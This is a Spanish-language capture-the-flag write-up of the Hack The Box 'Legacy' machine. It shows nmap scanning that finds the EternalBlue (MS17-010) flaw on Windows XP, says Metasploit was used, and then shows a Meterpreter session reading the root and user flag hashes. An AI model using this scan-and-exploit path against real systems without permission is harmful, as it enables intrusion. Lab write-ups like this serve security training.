Legacy

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

• Eternalblue Exploitation

Metodología:

Escaneo inicial de reconocimiento con nmap:

// 
❯ nmap -T4 -sS -Pn -p- --open -n 10.10.10.4 -oN first_scan

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-04 20:08 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.06% done
Stats: 0:00:27 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 35.00% done; ETC: 20:09 (0:00:50 remaining)
Nmap scan report for 10.10.10.4
Host is up (0.16s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds

Hacemos Escaneo de versiones y ejecucion de Scripts especifico en los puertos abiertos:

// 
❯ nmap -T4 -sS -Pn -p135,139,445 -sVC -n 10.10.10.4 -oN sV_scan

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2025-05-10T05:07:40+03:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b0:4c:57 (VMware)
|_clock-skew: mean: 5d00h27m31s, deviation: 2h07m16s, median: 4d22h57m31s

Buscamos con scripts específicos alguna vulnerabilidad del puerto 445 SMB:

// 
nmap --script "vuln and safe" -p445 10.10.10.4

PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Encontramos que es vulnerable al CVE-2017-0143 así que intentaremos explotarlo con Metasploit:

Resulto y estamos dentro, ahora Buscamos las Flags:

// 
(Meterpreter 1)(C:\windows) > cd /

(Meterpreter 1)(C:) > dir

Listing: C:\
Mode Size Type Last modified Name

100777/rwxrwxrwx 0 fil 2017-03-16 01:30:44 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2017-03-16 01:30:44 -0400 CONFIG.SYS
040777/rwxrwxrwx 0 dir 2017-03-16 02:07:20 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 IO.SYS
100444/r--r--r-- 0 fil 2017-03-16 01:30:44 -0400 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-13 16:13:04 -0400 NTDETECT.COM
040555/r-xr-xr-x 0 dir 2017-12-29 15:41:18 -0500 Program Files
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:59 -0400 System Volume Information
040777/rwxrwxrwx 0 dir 2025-05-09 22:27:02 -0400 WINDOWS
100666/rw-rw-rw- 211 fil 2017-03-16 01:26:58 -0400 boot.ini
100444/r--r--r-- 250048 fil 2008-04-13 18:01:44 -0400 ntldr
000000/--------- 0 fif 1969-12-31 19:00:00 -0500 pagefile.sys

(Meterpreter 1)(C:) > cd /Documents and Settings

[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.

(Meterpreter 1)(C:) > cd DOCUME1

(Meterpreter 1)(C:\DOCUME1) > dir

Listing: C:\DOCUME~1

Mode Size Type Last modified Name

040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john

(Meterpreter 1)(C:\DOCUME1) > cd Administrator

(Meterpreter 1)(C:\DOCUME1\Administrator) > dir

Listing: C:\DOCUME~1\Administrator

Mode Size Type Last modified Name

040555/r-xr-xr-x 0 dir 2017-03-16 02:07:29 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:18:27 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:32 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 My Documents
100666/rw-rw-rw- 786432 fil 2022-05-28 06:28:03 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:31 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 02:07:24 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2022-05-28 06:28:03 -0400 ntuser.ini

(Meterpreter 1)(C:\DOCUME1\Administrator) > cd Desktop

(Meterpreter 1)(C:\DOCUME1\Administrator\Desktop) > dir

Listing: C:\DOCUME~1\Administrator\Desktop

Mode Size Type Last modified Name

100444/r--r--r-- 32 fil 2017-03-16 02:18:50 -0400 root.txt

(Meterpreter 1)(C:\DOCUME~1\Administrator\Desktop) > cat root.txt

993442d258b0e0ec917cae9e695d5713

Meterpreter 1)(C:\DOCUME1) > dir

Listing: C:\DOCUME1

Mode Size Type Last modified Name

040777/rwxrwxrwx 0 dir 2017-03-16 02:07:21 -0400 Administrator
040777/rwxrwxrwx 0 dir 2017-03-16 01:29:48 -0400 All Users
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:37 -0400 Default User
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:52 -0400 LocalService
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:43 -0400 NetworkService
040777/rwxrwxrwx 0 dir 2017-03-16 01:33:42 -0400 john

(Meterpreter 1)(C:\DOCUME1) > cd /all_users

[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.

(Meterpreter 1)(C:\DOCUME1) > cd john

(Meterpreter 1)(C:\DOCUME1\john) > dir

Listing: C:\DOCUME1\john

Mode Size Type Last modified Name

040555/r-xr-xr-x 0 dir 2017-03-16 01:33:50 -0400 Application Data
040777/rwxrwxrwx 0 dir 2017-03-16 01:32:27 -0400 Cookies
040777/rwxrwxrwx 0 dir 2017-03-16 02:19:33 -0400 Desktop
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:55 -0400 Favorites
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 Local Settings
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 My Documents
100666/rw-rw-rw- 524288 fil 2017-03-16 02:19:59 -0400 NTUSER.DAT
100666/rw-rw-rw- 1024 fil 2025-05-09 13:22:42 -0400 NTUSER.DAT.LOG
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 NetHood
040777/rwxrwxrwx 0 dir 2017-03-16 01:20:48 -0400 PrintHood
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:54 -0400 Recent
040555/r-xr-xr-x 0 dir 2017-03-16 01:33:44 -0400 SendTo
040555/r-xr-xr-x 0 dir 2017-03-16 01:20:48 -0400 Start Menu
040777/rwxrwxrwx 0 dir 2017-03-16 01:28:41 -0400 Templates
100666/rw-rw-rw- 178 fil 2017-03-16 02:19:59 -0400 ntuser.ini

(Meterpreter 1)(C:\DOCUME1\john) > cd Desktop

(Meterpreter 1)(C:\DOCUME1\john\Desktop) > dir

Listing: C:\DOCUME~1\john\Desktop

Mode Size Type Last modified Name

100444/r--r--r-- 32 fil 2017-03-16 02:19:49 -0400 user.txt

(Meterpreter 1)(C:\DOCUME~1\john\Desktop) > cat user.txt

e69af0e4f443de7e36876fda4ec7644f

Y con la obtencion de las 2 flags ya dariamos por terminada la maquian Legacy.